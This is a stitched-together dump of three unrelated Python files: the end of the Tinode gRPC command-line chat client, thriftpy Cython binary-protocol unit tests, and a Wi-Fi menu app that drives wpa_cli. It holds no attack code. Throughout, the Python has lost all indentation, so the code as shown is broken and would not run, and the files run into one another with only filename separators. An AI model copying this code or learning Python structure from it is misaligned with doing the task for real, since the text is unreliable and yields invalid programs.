parser.add_argument('--photo', default=None, help='avatar file name')
parser.add_argument('--private', default=None, help='topic\'s private info')
parser.add_argument('--auth', default=None, help='default access mode for authenticated users')
parser.add_argument('--anon', default=None, help='default access mode for anonymous users')
parser.add_argument('--mode', default=None, help='new value of access mode')
parser.add_argument('--tags', default=None, help='tags for topic discovery, comma separated list without spaces')
parser.add_argument('--get-query', default=None, help='query for topic metadata or messages, comma separated list without spaces')
elif parts[0] == "leave":
parser = argparse.ArgumentParser(prog=parts[0], description='Detach or unsubscribe from topic')
parser.add_argument('topic', nargs='?', default=argparse.SUPPRESS, help='topic to detach from')
parser.add_argument('--topic', dest='topic', default=None, help='topic to detach from')
parser.add_argument('--unsub', action='store_true', help='detach and unsubscribe from topic')
elif parts[0] == "pub":
parser = argparse.ArgumentParser(prog=parts[0], description='Send message to topic')
parser.add_argument('topic', nargs='?', default=argparse.SUPPRESS, help='topic to publish to')
parser.add_argument('--topic', dest='topic', default=None, help='topic to publish to')
parser.add_argument('content', nargs='?', default=argparse.SUPPRESS, help='message to send')
parser.add_argument('--head', help='message headers')
parser.add_argument('--content', dest='content', help='message to send')
parser.add_argument('--drafty', help='structured message to send, e.g. drafty content')
parser.add_argument('--image', help='image file to insert into message (not implemented yet)')
parser.add_argument('--attachment', help='file to send as an attachment (not implemented yet)')
elif parts[0] == "get":
parser = argparse.ArgumentParser(prog=parts[0], description='Query topic for messages or metadata')
parser.add_argument('topic', nargs='?', default=argparse.SUPPRESS, help='topic to query')
parser.add_argument('--topic', dest='topic', default=None, help='topic to query')
parser.add_argument('--desc', action='store_true', help='query topic description')
parser.add_argument('--sub', action='store_true', help='query topic subscriptions')
parser.add_argument('--tags', action='store_true', help='query topic tags')
parser.add_argument('--data', action='store_true', help='query topic messages')
parser.add_argument('--cred', action='store_true', help='query account credentials')
elif parts[0] == "set":
parser = argparse.ArgumentParser(prog=parts[0], description='Update topic metadata')
parser.add_argument('topic', help='topic to update')
parser.add_argument('--fn', help='topic\'s title')
parser.add_argument('--photo', help='avatar file name')
parser.add_argument('--public', help='topic\'s public info, alternative to fn+photo')
parser.add_argument('--private', help='topic\'s private info')
parser.add_argument('--auth', help='default access mode for authenticated users')
parser.add_argument('--anon', help='default access mode for anonymous users')
parser.add_argument('--user', help='ID of the account to update')
parser.add_argument('--mode', help='new value of access mode')
parser.add_argument('--tags', help='tags for topic discovery, comma separated list without spaces')
parser.add_argument('--cred', help='credential to add in method:value format, e.g. email:test@example.com, tel:12345')
elif parts[0] == "note":
parser = argparse.ArgumentParser(prog=parts[0], description='Send notification to topic, ex "note kp"')
parser.add_argument('topic', help='topic to notify')
parser.add_argument('what', nargs='?', default='kp', const='kp', choices=['kp', 'read', 'recv'],
help='notification type: kp (key press), recv, read - message received or read receipt')
parser.add_argument('--seq', help='message ID being reported')
elif parts[0] == "upload":
parser = argparse.ArgumentParser(prog=parts[0], description='Upload file out of band')
parser.add_argument('filename', help='name of the file to upload')
elif macros:
parser = macros.parse_macro(parts)
return parser
# Parses command line into command and parameters.
def parse_input(cmd):
# Split line into parts using shell-like syntax.
try:
parts = shlex.split(cmd, comments=True)
except Exception as err:
printout('Error parsing command: ', err)
return None
if len(parts) == 0:
return None
parser = None
varname = None
synchronous = False
failOnError = False
if parts[0] == ".use":
parser = argparse.ArgumentParser(prog=parts[0], description='Set default user or topic')
parser.add_argument('--user', default="unchanged", help='ID of default (on_behalf_of) user')
parser.add_argument('--topic', default="unchanged", help='Name of default topic')
elif parts[0] == ".await" or parts[0] == ".must":
# .await|.must [<$variable_name>] <waitable_command> <params>
if len(parts) > 1:
synchronous = True
failOnError = parts[0] == ".must"
if len(parts) > 2 and parts[1][0] == '$':
# Varname is given
varname = parts[1]
parts = parts[2:]
parser = parse_cmd(parts)
else:
# No varname
parts = parts[1:]
parser = parse_cmd(parts)
elif parts[0] == ".log":
parser = argparse.ArgumentParser(prog=parts[0], description='Write value of a variable to stdout')
parser.add_argument('varname', help='name of the variable to print')
elif parts[0] == ".sleep":
parser = argparse.ArgumentParser(prog=parts[0], description='Pause execution')
parser.add_argument('millis', type=int, help='milliseconds to wait')
elif parts[0] == ".verbose":
parser = argparse.ArgumentParser(prog=parts[0], description='Toggle logging verbosity')
else:
parser = parse_cmd(parts)
if not parser:
printout("Unrecognized:", parts[0])
printout("Possible commands:")
printout("\t.await\t\t- wait for completion of an operation")
printout("\t.exit\t\t- exit the program (also .quit)")
printout("\t.log\t\t- write value of a variable to stdout")
printout("\t.must\t\t- wait for completion of an operation, terminate on failure")
printout("\t.sleep\t\t- pause execution")
printout("\t.use\t\t- set default user (on_behalf_of) or topic")
printout("\t.verbose\t- toggle logging verbosity on/off")
printout("\tacc\t\t- create or alter an account")
printout("\tdel\t\t- delete message(s), topic, subscription, or user")
printout("\tget\t\t- query topic for metadata or messages")
printout("\tleave\t\t- detach or unsubscribe from topic")
printout("\tlogin\t\t- authenticate current session")
printout("\tnote\t\t- send a notification")
printout("\tpub\t\t- post message to topic")
printout("\tset\t\t- update topic metadata")
printout("\tsub\t\t- subscribe to topic")
printout("\tupload\t\t- upload file out of band")
printout("\tusermod\t\t- modify user account")
printout("\n\tType <command> -h for help")
if macros:
printout("\nMacro commands:")
for key in sorted(macros.Macros):
macro = macros.Macros[key]
printout("\t%s\t\t- %s" % (macro.name(), macro.description()))
return None
try:
args = parser.parse_args(parts[1:])
args.cmd = parts[0]
args.synchronous = synchronous
args.failOnError = failOnError
if varname:
args.varname = varname
return args
except SystemExit:
return None
# Process command-line input string: execute local commands, generate
# protobuf messages for remote commands.
def serialize_cmd(string, id, args):
"""Take string read from the command line, convert in into a protobuf message"""
messages = {
"acc": accMsg,
"login": loginMsg,
"sub": subMsg,
"leave": leaveMsg,
"pub": pubMsg,
"get": getMsg,
"set": setMsg,
"del": delMsg,
"note": noteMsg,
}
try:
# Convert string into a dictionary
cmd = parse_input(string)
if cmd == None:
return None, None
# Process dictionary
if cmd.cmd == ".log":
stdoutln(getVar(cmd.varname))
return None, None
elif cmd.cmd == ".use":
if cmd.user != "unchanged":
if cmd.user:
if len(cmd.user) > 3 and cmd.user.startswith("usr"):
tn_globals.DefaultUser = cmd.user
else:
stdoutln("Error: user ID '{}' is invalid".format(cmd.user))
else:
tn_globals.DefaultUser = None
stdoutln("Default user='{}'".format(tn_globals.DefaultUser))
if cmd.topic != "unchanged":
if cmd.topic:
if cmd.topic[:3] in ['me', 'fnd', 'sys', 'usr', 'grp', 'chn']:
tn_globals.DefaultTopic = cmd.topic
else:
stdoutln("Error: topic '{}' is invalid".format(cmd.topic))
else:
tn_globals.DefaultTopic = None
stdoutln("Default topic='{}'".format(tn_globals.DefaultTopic))
return None, None
elif cmd.cmd == ".sleep":
stdoutln("Pausing for {}ms...".format(cmd.millis))
time.sleep(cmd.millis/1000.)
return None, None
elif cmd.cmd == ".verbose":
tn_globals.Verbose = not tn_globals.Verbose
stdoutln("Logging is {}".format("verbose" if tn_globals.Verbose else "normal"))
return None, None
elif cmd.cmd == "upload":
# Start async upload
upload_thread = threading.Thread(target=upload, args=(id, derefVals(cmd), args), name="Uploader_"+cmd.filename)
upload_thread.start()
cmd.no_yield = True
return True, cmd
elif cmd.cmd in messages:
return messages[cmd.cmd](id, derefVals(cmd), args), cmd
elif macros and cmd.cmd in macros.Macros:
return True, macros.Macros[cmd.cmd].run(id, derefVals(cmd), args)
else:
stdoutln("Error: unrecognized: '{}'".format(cmd.cmd))
return None, None
except Exception as err:
stdoutln("Error in '{0}': {1}".format(cmd.cmd, err))
return None, None
def pop_from_output_queue():
if tn_globals.OutputQueue.empty():
return False
sys.stdout.write("\r<= "+tn_globals.OutputQueue.get())
sys.stdout.flush()
return True
# Generator of protobuf messages.
def gen_message(scheme, secret, args):
"""Client message generator: reads user input as string,
converts to pb.ClientMsg, and yields"""
random.seed()
id = random.randint(10000,60000)
# Asynchronous input-output
tn_globals.InputThread = threading.Thread(target=stdin, args=(tn_globals.InputQueue,))
tn_globals.InputThread.daemon = True
tn_globals.InputThread.start()
msg = hiMsg(id, args.background)
if tn_globals.Verbose:
stdoutln("\r=> " + to_json(msg))
yield msg
if scheme != None:
id += 1
login = lambda:None
setattr(login, 'scheme', scheme)
setattr(login, 'secret', secret)
setattr(login, 'cred', None)
msg = loginMsg(id, login, args)
if tn_globals.Verbose:
stdoutln("\r=> " + to_json(msg))
yield msg
print_prompt = True
while True:
try:
if not tn_globals.WaitingFor and tn_globals.InputQueue:
id += 1
inp = tn_globals.InputQueue.popleft()
if inp == 'exit' or inp == 'quit' or inp == '.exit' or inp == '.quit':
# Drain the output queue.
while pop_from_output_queue():
pass
return
pbMsg, cmd = serialize_cmd(inp, id, args)
print_prompt = tn_globals.IsInteractive
if isinstance(cmd, list):
# Push the expanded macro back on the command queue.
tn_globals.InputQueue.extendleft(reversed(cmd))
continue
if pbMsg != None:
if not tn_globals.IsInteractive:
sys.stdout.write("=> " + inp + "\n")
sys.stdout.flush()
if cmd.synchronous:
cmd.await_ts = time.time()
cmd.await_id = str(id)
tn_globals.WaitingFor = cmd
if not hasattr(cmd, 'no_yield'):
if tn_globals.Verbose:
stdoutln("\r=> " + to_json(pbMsg))
yield pbMsg
elif not tn_globals.OutputQueue.empty():
pop_from_output_queue()
print_prompt = tn_globals.IsInteractive
else:
if print_prompt:
sys.stdout.write("tn> ")
sys.stdout.flush()
print_prompt = False
if tn_globals.WaitingFor:
if time.time() - tn_globals.WaitingFor.await_ts > AWAIT_TIMEOUT:
stdoutln("Timeout while waiting for '{0}' response".format(tn_globals.WaitingFor.cmd))
tn_globals.WaitingFor = None
if tn_globals.IsInteractive:
time.sleep(0.1)
else:
time.sleep(0.01)
except Exception as err:
stdoutln("Exception in generator: {0}".format(err))
# Handle {ctrl} server response
def handle_ctrl(ctrl):
# Run code on command completion
func = tn_globals.OnCompletion.get(ctrl.id)
if func:
del tn_globals.OnCompletion[ctrl.id]
if ctrl.code >= 200 and ctrl.code < 400:
func(ctrl.params)
if tn_globals.WaitingFor and tn_globals.WaitingFor.await_id == ctrl.id:
if 'varname' in tn_globals.WaitingFor:
tn_globals.Variables[tn_globals.WaitingFor.varname] = ctrl
if tn_globals.WaitingFor.failOnError and ctrl.code >= 400:
raise Exception(str(ctrl.code) + " " + ctrl.text)
tn_globals.WaitingFor = None
topic = " (" + str(ctrl.topic) + ")" if ctrl.topic else ""
stdoutln("\r<= " + str(ctrl.code) + " " + ctrl.text + topic)
# The main processing loop: send messages to server, receive responses.
def run(args, schema, secret):
failed = False
try:
if tn_globals.IsInteractive:
tn_globals.Prompt = PromptSession()
# Create secure channel with default credentials.
channel = None
if args.ssl:
opts = (('grpc.ssl_target_name_override', args.ssl_host),) if args.ssl_host else None
channel = grpc.secure_channel(args.host, grpc.ssl_channel_credentials(), opts)
else:
channel = grpc.insecure_channel(args.host)
# Call the server
stream = pbx.NodeStub(channel).MessageLoop(gen_message(schema, secret, args))
# Read server responses
for msg in stream:
if tn_globals.Verbose:
stdoutln("\r<= " + to_json(msg))
if msg.HasField("ctrl"):
handle_ctrl(msg.ctrl)
elif msg.HasField("meta"):
what = []
if len(msg.meta.sub) > 0:
what.append("sub")
if msg.meta.HasField("desc"):
what.append("desc")
if msg.meta.HasField("del"):
what.append("del")
if len(msg.meta.tags) > 0:
what.append("tags")
stdoutln("\r<= meta " + ",".join(what) + " " + msg.meta.topic)
if tn_globals.WaitingFor and tn_globals.WaitingFor.await_id == msg.meta.id:
if 'varname' in tn_globals.WaitingFor:
tn_globals.Variables[tn_globals.WaitingFor.varname] = msg.meta
tn_globals.WaitingFor = None
elif msg.HasField("data"):
stdoutln("\n\rFrom: " + msg.data.from_user_id)
stdoutln("Topic: " + msg.data.topic)
stdoutln("Seq: " + str(msg.data.seq_id))
if msg.data.head:
stdoutln("Headers:")
for key in msg.data.head:
stdoutln("\t" + key + ": "+str(msg.data.head[key]))
stdoutln(json.loads(msg.data.content))
elif msg.HasField("pres"):
# 'ON', 'OFF', 'UA', 'UPD', 'GONE', 'ACS', 'TERM', 'MSG', 'READ', 'RECV', 'DEL', 'TAGS'
what = pb.ServerPres.What.Name(msg.pres.what)
stdoutln("\r<= pres " + what + " " + msg.pres.topic)
elif msg.HasField("info"):
switcher = {
pb.READ: 'READ',
pb.RECV: 'RECV',
pb.KP: 'KP'
}
stdoutln("\rMessage #" + str(msg.info.seq_id) + " " + switcher.get(msg.info.what, "unknown") +
" by " + msg.info.from_user_id + "; topic=" + msg.info.topic + " (" + msg.topic + ")")
else:
stdoutln("\rMessage type not handled" + str(msg))
except grpc.RpcError as err:
# print(err)
printerr("gRPC failed with {0}: {1}".format(err.code(), err.details()))
failed = True
except Exception as ex:
printerr("Request failed: {0}".format(ex))
failed = True
finally:
printout('Shutting down...')
channel.close()
if tn_globals.InputThread != None:
tn_globals.InputThread.join(0.3)
return 1 if failed else 0
# Read cookie file for logging in with the cookie.
def read_cookie():
try:
cookie = open('.tn-cli-cookie', 'r')
params = json.load(cookie)
cookie.close()
return params.get("token")
except Exception as err:
printerr("Missing or invalid cookie file '.tn-cli-cookie'", err)
return None
# Lambda for handling login
def handle_login(params):
if params == None:
return None
# Protobuf map 'params' is a map which is not a python object or a dictionary. Convert it.
nice = {}
for p in params:
nice[p] = json.loads(params[p])
stdoutln("Authenticated as", nice.get('user'))
tn_globals.AuthToken = nice.get('token')
return nice
# Save cookie to file after successful login.
def save_cookie(params):
if params == None:
return
try:
cookie = open('.tn-cli-cookie', 'w')
json.dump(handle_login(params), cookie)
cookie.close()
except Exception as err:
stdoutln("Failed to save authentication cookie", err)
# Log server info.
def print_server_params(params):
servParams = []
for p in params:
servParams.append(p + ": " + str(json.loads(params[p])))
stdoutln("\r<= Connected to server: " + "; ".join(servParams))
if __name__ == '__main__':
"""Parse command-line arguments. Extract host name and authentication scheme, if one is provided"""
version = APP_VERSION + "/" + LIB_VERSION + "; gRPC/" + GRPC_VERSION + "; Python " + platform.python_version()
purpose = "Tinode command line client. Version " + version + "."
parser = argparse.ArgumentParser(description=purpose)
parser.add_argument('--host', default='localhost:16060', help='address of Tinode gRPC server')
parser.add_argument('--web-host', default='localhost:6060', help='address of Tinode web server (for file uploads)')
parser.add_argument('--ssl', action='store_true', help='connect to server over secure connection')
parser.add_argument('--ssl-host', help='SSL host name to use instead of default (useful for connecting to localhost)')
parser.add_argument('--login-basic', help='login using basic authentication username:password')
parser.add_argument('--login-token', help='login using token authentication')
parser.add_argument('--login-cookie', action='store_true', help='read token from cookie file and use it for authentication')
parser.add_argument('--no-login', action='store_true', help='do not login even if cookie file is present; default in non-interactive (scripted) mode')
parser.add_argument('--no-cookie', action='store_true', help='do not save login cookie; default in non-interactive (scripted) mode')
parser.add_argument('--api-key', default='AQEAAAABAAD_rAp4DJh05a1HAwFT3A6K', help='API key for file uploads')
parser.add_argument('--load-macros', default='./macros.py', help='path to macro module to load')
parser.add_argument('--version', action='store_true', help='print version')
parser.add_argument('--verbose', action='store_true', help='log full JSON representation of all messages')
parser.add_argument('--background', action='store_const', const=True, help='start interactive sessionin background (non-intractive is always in background)')
args = parser.parse_args()
if args.version:
printout(version)
exit()
if args.verbose:
tn_globals.Verbose = True
printout(purpose)
printout("Secure server" if args.ssl else "Server", "at '"+args.host+"'",
"SNI="+args.ssl_host if args.ssl_host else "")
schema = None
secret = None
if not args.no_login:
if args.login_token:
"""Use token to login"""
schema = 'token'
secret = args.login_token.encode('ascii')
printout("Logging in with token", args.login_token)
elif args.login_basic:
"""Use username:password"""
schema = 'basic'
secret = args.login_basic
printout("Logging in with login:password", args.login_basic)
elif tn_globals.IsInteractive:
"""Interactive mode only: try reading the cookie file"""
printout("Logging in with cookie file")
schema = 'token'
secret = read_cookie()
if not secret:
schema = None
# Attempt to load the macro file if available.
macros = None
if args.load_macros:
import importlib
macros = importlib.import_module('macros', args.load_macros) if args.load_macros else None
# Check if background session is specified explicitly. If not set it to
# True for non-interactive sessions.
if args.background is None and not tn_globals.IsInteractive:
args.background = True
sys.exit(run(args, schema, secret))
|
test_protocol_cybinary.py | # -*- coding: utf-8 -*-
import collections
import multiprocessing
import os
import time
import pytest
from thriftpy._compat import u
from thriftpy.thrift import TType, TPayload, TDecodeException
from thriftpy.transport import TSocket, TServerSocket
from thriftpy.utils import hexlify
from thriftpy._compat import PYPY
pytestmark = pytest.mark.skipif(PYPY,
reason="cython not enabled in pypy.")
if not PYPY:
from thriftpy.protocol import cybin as proto
from thriftpy.transport.memory import TCyMemoryBuffer
from thriftpy.transport.buffered import TCyBufferedTransport
class TItem(TPayload):
thrift_spec = {
1: (TType.I32, "id", False),
2: (TType.LIST, "phones", TType.STRING, False),
}
default_spec = [("id", None), ("phones", None)]
def test_write_bool():
b = TCyMemoryBuffer()
proto.write_val(b, TType.BOOL, 1)
b.flush()
assert "01" == hexlify(b.getvalue())
def test_read_bool():
b = TCyMemoryBuffer(b'\x01')
val = proto.read_val(b, TType.BOOL)
assert True is val
def test_write_i8():
b = TCyMemoryBuffer()
proto.write_val(b, TType.I08, 123)
b.flush()
assert "7b" == hexlify(b.getvalue())
def test_read_i8():
b = TCyMemoryBuffer(b'\x7b')
val = proto.read_val(b, TType.I08)
assert 123 == val
def test_write_i16():
b = TCyMemoryBuffer()
proto.write_val(b, TType.I16, 12345)
b.flush()
assert "30 39" == hexlify(b.getvalue())
def test_read_i16():
b = TCyMemoryBuffer(b"09")
val = proto.read_val(b, TType.I16)
assert 12345 == val
def test_byteswap_i16():
i = 128
b = TCyMemoryBuffer()
proto.write_val(b, TType.I16, i)
b.flush()
v = proto.read_val(b, TType.I16)
assert v == i
def test_write_i32():
b = TCyMemoryBuffer()
proto.write_val(b, TType.I32, 1234567890)
b.flush()
assert "49 96 02 d2" == hexlify(b.getvalue())
def test_read_i32():
b = TCyMemoryBuffer(b"I\x96\x02\xd2")
assert 1234567890 == proto.read_val(b, TType.I32)
def test_write_i64():
b = TCyMemoryBuffer()
proto.write_val(b, TType.I64, 1234567890123456789)
b.flush()
assert "11 22 10 f4 7d e9 81 15" == hexlify(b.getvalue())
def test_read_i64():
b = TCyMemoryBuffer(b"\x11\"\x10\xf4}\xe9\x81\x15")
assert 1234567890123456789 == proto.read_val(b, TType.I64)
def test_write_double():
b = TCyMemoryBuffer()
proto.write_val(b, TType.DOUBLE, 1234567890.1234567890)
b.flush()
assert "41 d2 65 80 b4 87 e6 b7" == hexlify(b.getvalue())
def test_read_double():
b = TCyMemoryBuffer(b"A\xd2e\x80\xb4\x87\xe6\xb7")
assert 1234567890.1234567890 == proto.read_val(b, TType.DOUBLE)
def test_write_string():
b = TCyMemoryBuffer()
proto.write_val(b, TType.STRING, "hello world!")
b.flush()
assert "00 00 00 0c 68 65 6c 6c 6f 20 77 6f 72 6c 64 21" == \
hexlify(b.getvalue())
b = TCyMemoryBuffer()
proto.write_val(b, TType.STRING, u("你好世界"))
b.flush()
assert "00 00 00 0c e4 bd a0 e5 a5 bd e4 b8 96 e7 95 8c" == \
hexlify(b.getvalue())
def test_read_string():
b = TCyMemoryBuffer(b"\x00\x00\x00\x0c"
b"\xe4\xbd\xa0\xe5\xa5\xbd\xe4\xb8\x96\xe7\x95\x8c")
assert u("你好世界") == proto.read_val(b, TType.STRING)
def test_read_binary():
b = TCyMemoryBuffer(b"\x00\x00\x00\x0c"
b"\xe4\xbd\xa0\xe5\xa5\xbd\xe4\xb8\x96\xe7\x95\x8c")
assert u("你好世界").encode("utf-8") == proto.read_val(
b, TType.STRING, decode_response=False)
def test_write_message_begin():
trans = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(trans)
b.write_message_begin("test", TType.STRING, 1)
b.write_message_end()
assert "80 01 00 0b 00 00 00 04 74 65 73 74 00 00 00 01" == \
hexlify(trans.getvalue())
def test_write_message_begin_no_strict():
trans = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(trans, strict_write=False)
b.write_message_begin("test", TType.STRING, 1)
b.write_message_end()
assert "00 00 00 04 74 65 73 74 0b 00 00 00 01" == \
hexlify(trans.getvalue())
def test_read_message_begin():
b = TCyMemoryBuffer(b"\x80\x01\x00\x0b\x00\x00\x00\x04test"
b"\x00\x00\x00\x01")
res = proto.TCyBinaryProtocol(b).read_message_begin()
assert res == ("test", TType.STRING, 1)
def test_read_message_begin_not_strict():
b = TCyMemoryBuffer(b"\x00\x00\x00\x04test\x0b\x00\x00\x00\x01")
res = proto.TCyBinaryProtocol(b, strict_read=False).read_message_begin()
assert res == ("test", TType.STRING, 1)
def test_write_struct():
trans = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(trans)
item = TItem(id=123, phones=["123456", "abcdef"])
b.write_struct(item)
b.write_message_end()
assert ("08 00 01 00 00 00 7b 0f 00 02 0b 00 00 00 02 00 00 00 "
"06 31 32 33 34 35 36 00 00 00 06 61 62 63 64 65 66 00") == \
hexlify(trans.getvalue())
def test_read_struct():
b = TCyMemoryBuffer(b"\x08\x00\x01\x00\x00\x00{"
b"\x0f\x00\x02\x0b\x00\x00\x00"
b"\x02\x00\x00\x00\x06123456"
b"\x00\x00\x00\x06abcdef\x00")
b = proto.TCyBinaryProtocol(b)
_item = TItem(id=123, phones=["123456", "abcdef"])
_item2 = TItem()
b.read_struct(_item2)
assert _item == _item2
def test_write_empty_struct():
trans = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(trans)
item = TItem()
b.write_struct(item)
b.write_message_end()
assert "00" == hexlify(trans.getvalue())
def test_read_empty_struct():
b = TCyMemoryBuffer(b"\x00")
b = proto.TCyBinaryProtocol(b)
_item = TItem()
_item2 = TItem()
b.read_struct(_item2)
assert _item == _item2
def test_write_huge_struct():
b = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(b)
item = TItem(id=12345, phones=["1234567890"] * 100000)
b.write_struct(item)
b.write_message_end()
def test_read_huge_args():
class Hello(TPayload):
thrift_spec = {
1: (TType.STRING, "name", False),
2: (TType.STRING, "world", False),
}
default_spec = [("name", None), ("world", None)]
b = TCyMemoryBuffer()
item = Hello(name='我' * 326, world='你' * 1365)
p = proto.TCyBinaryProtocol(b)
p.write_struct(item)
p.write_message_end()
item2 = Hello()
p.read_struct(item2)
def test_skip_bool():
b = TCyMemoryBuffer()
proto.write_val(b, TType.BOOL, 1)
proto.write_val(b, TType.I32, 123)
b.flush()
proto.skip(b, TType.BOOL)
assert 123 == proto.read_val(b, TType.I32)
def test_skip_double():
b = TCyMemoryBuffer()
proto.write_val(b, TType.DOUBLE, 0.123425897)
proto.write_val(b, TType.I32, 123)
b.flush()
proto.skip(b, TType.DOUBLE)
assert 123 == proto.read_val(b, TType.I32)
def test_skip_string():
b = TCyMemoryBuffer()
proto.write_val(b, TType.STRING, "hello world")
proto.write_val(b, TType.I32, 123)
b.flush()
proto.skip(b, TType.STRING)
assert 123 == proto.read_val(b, TType.I32)
def test_skip_list():
b = TCyMemoryBuffer()
proto.write_val(b, TType.LIST, [5, 6, 7, 8, 9], spec=TType.I32)
proto.write_val(b, TType.I32, 123)
b.flush()
proto.skip(b, TType.LIST)
assert 123 == proto.read_val(b, TType.I32)
def test_skip_map():
b = TCyMemoryBuffer()
proto.write_val(b, TType.MAP, {"hello": 0.3456},
spec=(TType.STRING, TType.DOUBLE))
proto.write_val(b, TType.I32, 123)
b.flush()
proto.skip(b, TType.MAP)
assert 123 == proto.read_val(b, TType.I32)
def test_skip_struct():
b = TCyMemoryBuffer()
p = proto.TCyBinaryProtocol(b)
item = TItem(id=123, phones=["123456", "abcdef"])
p.write_struct(item)
p.write_message_end()
proto.write_val(b, TType.I32, 123)
b.flush()
proto.skip(b, TType.STRUCT)
assert 123 == proto.read_val(b, TType.I32)
def test_read_long_data():
val = 'z' * 97 * 1024
unix_sock = "/tmp/thriftpy_test.sock"
def serve():
server_sock = TServerSocket(unix_socket=unix_sock)
server_sock.listen()
client = server_sock.accept()
t = TCyBufferedTransport(client)
proto.write_val(t, TType.STRING, val)
t.flush()
# wait for client to read
time.sleep(1)
p = multiprocessing.Process(target=serve)
p.start()
time.sleep(0.1)
try:
sock = TSocket(unix_socket=unix_sock)
b = TCyBufferedTransport(sock)
b.open()
assert val == proto.read_val(b, TType.STRING)
sock.close()
finally:
p.terminate()
try:
os.remove(unix_sock)
except IOError:
pass
def test_write_wrong_arg_type():
trans = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(trans)
item = TItem(id="wrong type", phones=["123456", "abcdef"])
try:
b.write_struct(item)
except Exception:
pass
b.write_message_end()
item2 = TItem(id=123, phones=["123456", "abcdef"])
b.write_struct(item2)
b.write_message_end()
assert ("08 00 01 00 00 00 7b 0f 00 02 0b 00 00 00 02 00 00 00 "
"06 31 32 33 34 35 36 00 00 00 06 61 62 63 64 65 66 00") == \
hexlify(trans.getvalue())
def test_read_wrong_arg_type():
class TWrongTypeItem(TPayload):
thrift_spec = {
1: (TType.STRING, "id", False),
2: (TType.LIST, "phones", TType.STRING, False),
}
default_spec = [("id", None), ("phones", None)]
trans = TCyMemoryBuffer()
b = proto.TCyBinaryProtocol(trans)
item = TItem(id=58, phones=["123456", "abcdef"])
b.write_struct(item)
b.write_message_end()
item2 = TWrongTypeItem()
try:
b.read_struct(item2)
except Exception:
pass
item3 = TItem(id=123, phones=["123456", "abcdef"])
b.write_struct(item3)
b.write_message_end()
item4 = TItem()
b.read_struct(item4)
assert item3 == item4
def test_multiple_read_struct():
t = TCyMemoryBuffer()
p = proto.TCyBinaryProtocol(t)
item1 = TItem(id=123, phones=["123456", "abcdef"])
item2 = TItem(id=234, phones=["110", "120"])
p.write_struct(item1)
p.write_struct(item2)
p.write_message_end()
_item1 = TItem()
_item2 = TItem()
p.read_struct(_item1)
p.read_struct(_item2)
assert _item1 == item1 and _item2 == item2
def test_write_decode_error():
t = TCyMemoryBuffer()
p = proto.TCyBinaryProtocol(t)
class T(TPayload):
thrift_spec = {
1: (TType.I32, "id", False),
2: (TType.LIST, "phones", TType.STRING, False),
3: (TType.STRUCT, "item", TItem, False),
4: (TType.MAP, "mm", (TType.STRING, (TType.STRUCT, TItem)), False)
}
default_spec = [("id", None), ("phones", None), ("item", None),
("mm", None)]
cases = [
(T(id="hello"), "Field 'id(1)' of 'T' needs type 'I32', but the value is `'hello'`"), # noqa
(T(phones=[90, 12]), "Field 'phones(2)' of 'T' needs type 'LIST<STRING>', but the value is `[90, 12]`"), # noqa
(T(item=12), "Field 'item(3)' of 'T' needs type 'TItem', but the value is `12`"), # noqa
(T(mm=[45, 56]), "Field 'mm(4)' of 'T' needs type 'MAP<STRING, TItem>', but the value is `[45, 56]`") # noqa
]
for obj, res in cases:
with pytest.raises(TDecodeException) as exc:
p.write_struct(obj)
assert str(exc.value) == res
def test_type_tolerance():
t = TCyMemoryBuffer()
p = proto.TCyBinaryProtocol(t)
class T(TPayload):
thrift_spec = {
1: (TType.LIST, "phones", TType.STRING, False),
2: (TType.MAP, "mm", (TType.I32, (TType.LIST, TType.I32)), False)
}
default_spec = [("phones", None), ("mm", None)]
defaultdict = collections.defaultdict(list)
defaultdict.update({234: [3, 4, 5], 123: [6, 7, 8]})
cases = [
T(phones=["123", "234"]),
T(phones=("123", "234")),
T(phones={"123", "234"}),
T(phones={"123": 'a', "234": 'b'}),
T(mm={234: [3, 4, 5], 123: [6, 7, 8]}),
T(mm=collections.defaultdict(list)),
T(mm=defaultdict)
]
for obj in cases:
p.write_struct(obj)
|
main.py | from helpers import setup_logger
menu_name = "Wireless"
i = None
o = None
from time import sleep
from threading import Thread
from traceback import format_exc
from ui import Menu, Printer, MenuExitException, UniversalInput, Refresher, DialogBox, ellipsize
import wpa_cli
logger = setup_logger(__name__, "warning")
def show_scan_results():
network_menu_contents = []
networks = wpa_cli.get_scan_results()
for network in networks:
if network["ssid"] == '':
ssid = '[Hidden]'
elif network["ssid"]:
ssid = network["ssid"]
network_menu_contents.append([ssid, lambda x=network: network_info_menu(x)])
network_menu = Menu(network_menu_contents, i, o, "Wireless network menu")
network_menu.activate()
def network_info_menu(network_info):
network_info_contents = [
["Connect", lambda x=network_info: connect_to_network(x)],
["BSSID", lambda x=network_info['bssid']: Printer(x, i, o, 5, skippable=True)],
["Frequency", lambda x=network_info['frequency']: Printer(x, i, o, 5, skippable=True)],
["Open" if wpa_cli.is_open_network(network_info) else "Secured", lambda x=network_info['flags']: Printer(x, i, o, 5, skippable=True)]]
network_info_menu = Menu(network_info_contents, i, o, "Wireless network info", catch_exit=False)
network_info_menu.activate()
def connect_to_network(network_info):
#First, looking in the known networks
configured_networks = wpa_cli.list_configured_networks()
for network in configured_networks:
if network_info['ssid'] == network['ssid']:
Printer([network_info['ssid'], "known,connecting"], i, o, 1)
wpa_cli.enable_network(network['network id'])
wpa_cli.save_config()
raise MenuExitException
#Then, if it's an open network, just connecting
if wpa_cli.is_open_network(network_info):
network_id = wpa_cli.add_network()
Printer(["Network is open", "adding to known"], i, o, 1)
ssid = network_info['ssid']
wpa_cli.set_network(network_id, 'ssid', '"{}"'.format(ssid))
wpa_cli.set_network(network_id, 'key_mgmt', 'NONE')
Printer(["Connecting to", network_info['ssid']], i, o, 1)
wpa_cli.enable_network(network_id)
wpa_cli.save_config()
raise MenuExitException
#Offering to enter a password
else:
input = UniversalInput(i, o, message="Password:", name="WiFi password enter UI element")
password = input.activate()
if password is None:
return False
network_id = wpa_cli.add_network()
Printer(["Password entered", "adding to known"], i, o, 1)
ssid = network_info['ssid']
wpa_cli.set_network(network_id, 'ssid', '"{}"'.format(ssid))
wpa_cli.set_network(network_id, 'psk', '"{}"'.format(password))
Printer(["Connecting to", network_info['ssid']], i, o, 1)
wpa_cli.enable_network(network_id)
wpa_cli.save_config()
raise MenuExitException
#No WPS PIN input possible yet and I cannot yet test WPS button functionality.
